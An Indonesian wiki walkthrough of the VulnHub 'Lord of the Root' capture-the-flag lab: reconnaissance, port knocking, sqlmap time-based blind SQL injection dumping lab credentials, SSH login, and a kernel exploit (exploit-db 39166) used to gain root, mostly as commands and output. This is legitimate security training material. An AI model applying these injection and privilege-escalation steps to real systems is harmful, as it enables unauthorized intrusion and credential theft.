Difference between revisions of "CTF Lord of the root: Walkthrough"

From OnnoWiki
Jump to navigation Jump to search
 
(2 intermediate revisions by the same user not shown)
Line 394: Line 394:
 
  sqlmap -r /home/kali/request.txt --dbms=MYSQL --risk=3 --level=5 -D Webapp -T Users --dump
 
  sqlmap -r /home/kali/request.txt --dbms=MYSQL --risk=3 --level=5 -D Webapp -T Users --dump
 
   
 
   
Bagian ini juga tidak kalah lama-nya, hasilnya,
+
Bagian ini jauh lebih lama lagi, butuh waktu berjam-jam, hasilnya,
 +
 +
Database: Webapp
 +
Table: Users
 +
[5 entries]
 +
+----+------------------+----------+
 +
| id | password        | username |
 +
+----+------------------+----------+
 +
| 1  | iwilltakethering | frodo    |
 +
| 2  | MyPreciousR00t  | smeagol  |
 +
| 3  | AndMySword      | aragorn  |
 +
| 4  | AndMyBow        | legolas  |
 +
| 5  | AndMyAxe        | gimli    |
 +
+----+------------------+----------+
 +
 +
[17:16:16] [INFO] table 'Webapp.Users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.0.139/dump/Webapp/Users.csv'
 +
[17:16:16] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.0.139'
 +
 
 +
[*] ending @ 17:16:16 /2023-01-28/
 +
 
 +
Akhirnya password bisa jebol :) ...
  
 
==ssh==
 
==ssh==

Latest revision as of 05:31, 29 January 2023

Download dari https://download.vulnhub.com/lordoftheroot/LordOfTheRoot_1.0.1.ova Install di VirtualBox

netdiscover

Lakukan,

netdiscover -r 192.168.0.0/24

Hasilnya,

Currently scanning: 192.168.0.0/24   |   Screen View: Unique Hosts                                                                                                                                                               
                                                                                                                                                                                                                                  
 21 Captured ARP Req/Rep packets, from 21 hosts.   Total size: 1260                                                                                                                                                               
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
.....
192.168.0.139   08:00:27:45:35:64      1      60  PCS Systemtechnik GmbH                                                                                                                                                         
.....

port scan

Lakukan,

nmap -sT -p- -A 192.168.0.139

Hasil,

Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-28 02:13 EST
Nmap scan report for 192.168.0.139
Host is up (0.00089s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 3c3de38e35f9da7420efaa494a1deddd (DSA)
|   2048 85946c87c9a8350f2cdbbbc13f2a50c1 (RSA)
|   256 f3cdaa1d05f21e8c618725b6f4344537 (ECDSA)
|_  256 34ec16dda7cf2a8645ec65ea05438921 (ED25519)
MAC Address: 08:00:27:45:35:64 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.16 - 4.6, Linux 3.2 - 4.9, Linux 4.4
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.89 ms 192.168.0.139

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.51 seconds

tampaknya hanya SSH yang terlihat.


coba ssh

Lakukan,

ssh 192.168.0.139

Hasil,

The authenticity of host '192.168.0.139 (192.168.0.139)' can't be established.
ED25519 key fingerprint is SHA256:Rz24fg01xp2jMdwk9c44ijnZAz1uaUlvRXX7QU+ERtI.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.0.139' (ED25519) to the list of known hosts.

                                                  .____    _____________________________
                                                  |    |   \_____  \__    ___/\______   \
                                                  |    |    /   |   \|    |    |       _/
                                                  |    |___/    |    \    |    |    |   \
                                                  |_______ \_______  /____|    |____|_  /
                                                          \/       \/                 \/
 ____  __.                     __     ___________      .__                   .___ ___________      ___________       __
|    |/ _| ____   ____   ____ |  | __ \_   _____/______|__| ____   ____    __| _/ \__    ___/___   \_   _____/ _____/  |_  ___________
|      <  /    \ /  _ \_/ ___\|  |/ /  |    __) \_  __ \  |/ __ \ /    \  / __ |    |    | /  _ \   |    __)_ /    \   __\/ __ \_  __ \
|    |  \|   |  (  <_> )  \___|    <   |     \   |  | \/  \  ___/|   |  \/ /_/ |    |    |(  <_> )  |        \   |  \  | \  ___/|  | \/
|____|__ \___|  /\____/ \___  >__|_ \  \___  /   |__|  |__|\___  >___|  /\____ |    |____| \____/  /_______  /___|  /__|  \___  >__|
        \/    \/            \/     \/      \/                  \/     \/      \/                           \/     \/          \/
Easy as 1,2,3
root@192.168.0.139's password: 

Ada kata-2 "Easy as 1,2,3"

Hmm kita coba knock port 1, 2, 3 ...

port knocking

Lakukan,

nmap -Pn --host-timeout 201 --max-retries 0  -p 1 192.168.0.139
nmap -Pn --host-timeout 201 --max-retries 0  -p 2 192.168.0.139
nmap -Pn --host-timeout 201 --max-retries 0  -p 3 192.168.0.139

Naga-naganya port knocking untuk membuka / menghidupkan web :) ..

lakukan nmap lagi

Lakukan

nmap -sT -p- -A 192.168.0.139

Hasilnya,

Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-28 02:22 EST
Nmap scan report for 192.168.0.139
Host is up (0.00063s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 3c3de38e35f9da7420efaa494a1deddd (DSA)
|   2048 85946c87c9a8350f2cdbbbc13f2a50c1 (RSA)
|   256 f3cdaa1d05f21e8c618725b6f4344537 (ECDSA)
|_  256 34ec16dda7cf2a8645ec65ea05438921 (ED25519)
1337/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.7 (Ubuntu)
MAC Address: 08:00:27:45:35:64 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.16 - 4.6, Linux 3.2 - 4.9, Linux 4.4
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 

TRACEROUTE
HOP RTT     ADDRESS
1   0.63 ms 192.168.0.139

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 122.69 seconds


Terlihat Ada web Server Apache 2.4.7 di port 1337


Akses Web

URL,

http://192.168.0.139:1337  (ada gambar dengan kata2 "I will do it, I will take the ring into mordor" )

Source (CRTL-U)

<html> <img src="/images/iwilldoit.jpg" align="middle"> </html>

coba

http://192.168.0.139:1337/mordor/

Source (CRTL-U)

<html> <img src="/images/hipster.jpg" align="middle"> <!--THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh> </html>


Ada !--THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh .... di catat.

Coba Nikto

Lakukan,

nikto -h 192.168.0.139:1337

Hasil,

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.0.139
+ Target Hostname:    192.168.0.139
+ Target Port:        1337
+ Start Time:         2023-01-28 02:34:02 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7917 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2023-01-28 02:34:55 (GMT-5) (53 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


Tidak ada yang terlalu menarik

coba dirb

Lakukan,

# dirb http://192.168.0.139:1337/  

Hasil,

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Jan 28 02:41:49 2023
URL_BASE: http://192.168.0.139:1337/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.0.139:1337/ ----
==> DIRECTORY: http://192.168.0.139:1337/images/                                                                                                                                                                                  
+ http://192.168.0.139:1337/index.html (CODE:200|SIZE:64)                                                                                                                                                                         
+ http://192.168.0.139:1337/server-status (CODE:403|SIZE:295)                                                                                                                                                                     
                                                                                                                                                                                                                                   
---- Entering directory: http://192.168.0.139:1337/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Sat Jan 28 02:41:55 2023
DOWNLOADED: 4612 - FOUND: 2

Tidak ada yang terlalu menarik

coba decode base 64

Lakukan,

echo "THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh~" | base64 -d

Hasilnya,

Lzk3ODM0NTIxMC9pbmRleC5waHA= Closer!base64: invalid input

Coba lagi,

echo "Lzk3ODM0NTIxMC9pbmRleC5waHA=" | base64 -d

Hasil,

/978345210/index.php 

Sepertinya ini URL :) ..

Akses web /978345210/index.php

Browse ke

http://192.168.0.139:1337/978345210/index.php 

Terlihat di layar,

Welcome to the Gates of Mordor
User :
Password : 
[Login]

Ini tampaknya sulit untuk di bypass :( .. Perlu di coba SQL injection

Burp

  • Di CLI Jalankan
burpsuite
  • Klik "I Accept"
  • Klik "Temporary Project" > Next
  • Klik "Use Burp defaults" > Start Burp
  • Select "Proxy" > "Intercept" > Klik "Intercept is Off" supaya jadi "Intercept is on"

Pada Browser

  • Klik Setting > Network Settings > Settings > Manual Proxy Configuration > HTTP Proxy isi dengan 127.0.0.1 port 8080

Browse ke

http://192.168.0.139:1337/978345210/index.php
username admin
password admin

Hasil tangkapan brupsuite kira-kira sebagai berikut,


POST /978345210/index.php HTTP/1.1
Host: 192.168.0.139:1337
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.139:1337/978345210/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Origin: http://192.168.0.139:1337
Connection: close
Cookie: PHPSESSID=9lhs598hql78hpclnss6h346q6
Upgrade-Insecure-Requests: 1 

username=admin&password=admin&submit=+Login+

Buat file request.txt isinya tulisan di atas hasil burp.

SQL Injection

Buat text request.txt

vi request.txt

Isi dengan hasil burp di atas. Kemudian lakukan,

sqlmap -r /home/kali/request.txt --risk=3 --level=5

Hasilnya,

.....
sqlmap identified the following injection point(s) with a total of 4654 HTTP(s) requests:
---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=admin' AND (SELECT 4131 FROM (SELECT(SLEEP(5)))rPXk)-- dvNV&password=admin&submit= Login

Tampaknya kita perlu menggunakan time-based blind. Lakukan,

sqlmap -r /home/kali/request.txt --dbms=MYSQL --risk=3 --level=5 –current-db

Hasilnya,

current database: 'Webapp'
[04:21:28] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.0.139'

[*] ending @ 04:21:28 /2023-01-28/

Ternyata database yang digunakan bernama Webapp Enumerate tabel, lakukan,

sqlmap -r /home/kali/request.txt --dbms=MYSQL --risk=3 --level=5 -D Webapp --tables

Hasilnya,

Database: Webapp
[1 table]
+-------+
| Users |
+-------+

[04:39:32] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.0.139'

[*] ending @ 04:39:32 /2023-01-28/

Enumerate kolom dari tabel Users, lakukan,

sqlmap -r /home/kali/request.txt --dbms=MYSQL --risk=3 --level=5 -D Webapp -T Users –columns

Bagian ini lumayan lama sekali menunggu-nya, hasilnya,

Database: Webapp
Table: Users
[3 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| id       | int(10)      |
| password | varchar(255) |
| username | varchar(255) |
+----------+--------------+

[05:36:34] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.0.139'

[*] ending @ 05:36:34 /2023-01-28/

Dump password, lakukan,

sqlmap -r /home/kali/request.txt --dbms=MYSQL --risk=3 --level=5 -D Webapp -T Users --dump

Bagian ini jauh lebih lama lagi, butuh waktu berjam-jam, hasilnya,

Database: Webapp
Table: Users
[5 entries]
+----+------------------+----------+
| id | password         | username |
+----+------------------+----------+
| 1  | iwilltakethering | frodo    |
| 2  | MyPreciousR00t   | smeagol  |
| 3  | AndMySword       | aragorn  |
| 4  | AndMyBow         | legolas  |
| 5  | AndMyAxe         | gimli    |
+----+------------------+----------+

[17:16:16] [INFO] table 'Webapp.Users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.0.139/dump/Webapp/Users.csv'
[17:16:16] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.0.139' 
[*] ending @ 17:16:16 /2023-01-28/

Akhirnya password bisa jebol :) ...

ssh

Lakukan,

ssh smeagol@192.168.0.139

password adalah MyPreciousR00t

Hasilnya,

                                                  .____    _____________________________
                                                  |    |   \_____  \__    ___/\______   \
                                                  |    |    /   |   \|    |    |       _/
                                                  |    |___/    |    \    |    |    |   \
                                                  |_______ \_______  /____|    |____|_  /
                                                          \/       \/                 \/
 ____  __.                     __     ___________      .__                   .___ ___________      ___________       __
|    |/ _| ____   ____   ____ |  | __ \_   _____/______|__| ____   ____    __| _/ \__    ___/___   \_   _____/ _____/  |_  ___________
|      <  /    \ /  _ \_/ ___\|  |/ /  |    __) \_  __ \  |/ __ \ /    \  / __ |    |    | /  _ \   |    __)_ /    \   __\/ __ \_  __ \
|    |  \|   |  (  <_> )  \___|    <   |     \   |  | \/  \  ___/|   |  \/ /_/ |    |    |(  <_> )  |        \   |  \  | \  ___/|  | \/
|____|__ \___|  /\____/ \___  >__|_ \  \___  /   |__|  |__|\___  >___|  /\____ |    |____| \____/  /_______  /___|  /__|  \___  >__|
        \/    \/            \/     \/      \/                  \/     \/      \/                           \/     \/          \/
Easy as 1,2,3
smeagol@192.168.0.139's password: 
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 3.19.0-25-generic i686) 

 * Documentation:  https://help.ubuntu.com/ 

                            .____    _____________________________                              
                            |    |   \_____  \__    ___/\______   \                             
                            |    |    /   |   \|    |    |       _/                             
                            |    |___/    |    \    |    |    |   \                             
                            |_______ \_______  /____|    |____|_  /                             
                                    \/       \/                 \/                              
 __      __       .__                                ___________      .__                   .___
/  \    /  \ ____ |  |   ____  ____   _____   ____   \_   _____/______|__| ____   ____    __| _/
\   \/\/   // __ \|  | _/ ___\/  _ \ /     \_/ __ \   |    __) \_  __ \  |/ __ \ /    \  / __ | 
 \        /\  ___/|  |_\  \__(  <_> )  Y Y  \  ___/   |     \   |  | \/  \  ___/|   |  \/ /_/ | 
  \__/\  /  \___  >____/\___  >____/|__|_|  /\___  >  \___  /   |__|  |__|\___  >___|  /\____ | 
       \/       \/          \/            \/     \/       \/                  \/     \/      \/ 
Last login: Tue Sep 22 12:59:38 2015 from 192.168.55.135
smeagol@LordOfTheRoot:~$ 


Privilege Escalation

Karena target menggunakan ubuntu 14.04, kita mencoba overlayfs untuk priviledge escalation. Di Kali Linux lakukan,

updatedb
locate 39166.c

Hasilnya,

/usr/share/exploitdb/exploits/linux/local/39166.c

Transfer 39166.c ke target username smeagol password MyPreciousR00t

scp /usr/share/exploitdb/exploits/linux/local/39166.c smeagol@192.168.0.139:
smeagol@192.168.0.139's password: 
39166.c
249.5KB/s   00:00


Di target, lakukan,

smeagol@LordOfTheRoot:~$ chmod 777 39166.c 
smeagol@LordOfTheRoot:~$ gcc -o 39166.o 39166.c 
smeagol@LordOfTheRoot:~$ ./39166.o 
root@LordOfTheRoot:~# 

Nah kita berubah menjadi root sekarang :) .. Lakukan,

root@LordOfTheRoot:~# id
uid=0(root) gid=1000(smeagol) groups=0(root),1000(smeagol)
root@LordOfTheRoot:~# cd /root/
root@LordOfTheRoot:/root# ls
buf  buf.c  Flag.txt  other  other.c  switcher.py
root@LordOfTheRoot:/root# cat Flag.txt 
“There is only one Lord of the Ring, only one who can bend it to his will. And he does not share power.”
– Gandalf
root@LordOfTheRoot:/root# 


Flag-nya adalah

“There is only one Lord of the Ring, only one who can bend it to his will. And he does not share power.”
– Gandalf


Recap

Halaman splash SSH memberikan petunjuk port knocking; menggunakan port knocking untuk membuka port baru (1337). Kita menjelajahi port itu, memeriksa source code untuk menemukan double Base64 encoded directory. Di direktori itu ada halaman otentikasi formulir. Menggunakan Burp Suite Pro untuk menemukan kemungkinan kerentanan SQLi. Mengonfirmasi kerentanan dalam SQLMap dan membuang kredensial aplikasi web (validasi input pengguna yang tidak tepat). Menggunakan salah satu kredensial untuk masuk sebagai pengguna di SSH (penggunaan ulang kata sandi). Menggunakan eksploitasi kernel lokal untuk escalate privileges ke root (unpatched server).

Referensi